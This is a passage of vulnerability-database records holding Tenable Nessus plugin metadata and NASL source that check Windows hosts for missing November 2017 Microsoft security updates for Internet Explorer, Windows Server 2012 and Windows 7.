"CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11846"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_NOV_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104894", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104894);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11834\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11848\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\"\n );\n script_bugtraq_id(\n 101703,\n 101709,\n 101715,\n 101716,\n 101722,\n 101725,\n 101737,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753\n );\n script_xref(name:\"MSKB\", value:\"4048957\");\n script_xref(name:\"MSKB\", value:\"4048959\");\n script_xref(name:\"MSKB\", value:\"4048958\");\n script_xref(name:\"MSKB\", value:\"4047206\");\n script_xref(name:\"MSFT\", value:\"MS17-4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4047206\");\n\n script_name(english:\"Security Updates for Internet Explorer (November 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\");\n # https://support.microsoft.com/en-us/help/4048957/windows-7-update-kb4048957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ad6eb38\");\n # https://support.microsoft.com/en-us/help/4048959/windows-server-2012-update-kb4048959\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6afa4db\");\n # https://support.microsoft.com/en-us/help/4048958/windows-81-update-kb4048958\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b7fa1d0\");\n # https://support.microsoft.com/en-us/help/4047206/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?da0fd90f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11827\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-11';\nkbs = make_list(\n '4048957',\n '4048959',\n '4048958',\n '4047206'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18838\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22297\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18838\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21073\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4047206 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4048958 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048958', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4048959 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048959', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4048957 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048957', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:37", "description": "The remote Windows host is missing security update 4048962\nor cumulative update 4048959. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11843, CVE-2017-11846)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows Server 2012 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048959.NASL", "href": "https://www.tenable.com/plugins/nessus/104555", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104555);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11832\",\n \"CVE-2017-11834\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101719,\n 101721,\n 101725,\n 101726,\n 101729,\n 101738,\n 101740,\n 101741,\n 101742,\n 101751,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048962\");\n script_xref(name:\"MSKB\", value:\"4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048962\");\n\n script_name(english:\"Windows Server 2012 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048962\nor cumulative update 4048959. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11843, CVE-2017-11846)\");\n # https://support.microsoft.com/en-us/help/4048962/windows-server-2012-update-kb4048962\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8767d873\");\n # https://support.microsoft.com/en-us/help/4048959/windows-server-2012-update-kb4048959\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6afa4db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048962 or Cumulative update KB4048959.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048962', '4048959');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048962, 4048959])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:35", "description": "The remote Windows host is missing security update 4048960\nor cumulative update 4048957. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832,\n CVE-2017-11835)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851,\n CVE-2017-11852)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048957.NASL", "href": "https://www.tenable.com/plugins/nessus/104553", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104553);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11832\",\n \"CVE-2017-11834\",\n \"CVE-2017-11835\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11851\",\n \"CVE-2017-11852\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101721,\n 101722,\n 101725,\n 101726,\n 101729,\n 101736,\n 101737,\n 101739,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048960\");\n script_xref(name:\"MSKB\", value:\"4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048960\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048960\nor cumulative update 4048957. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise 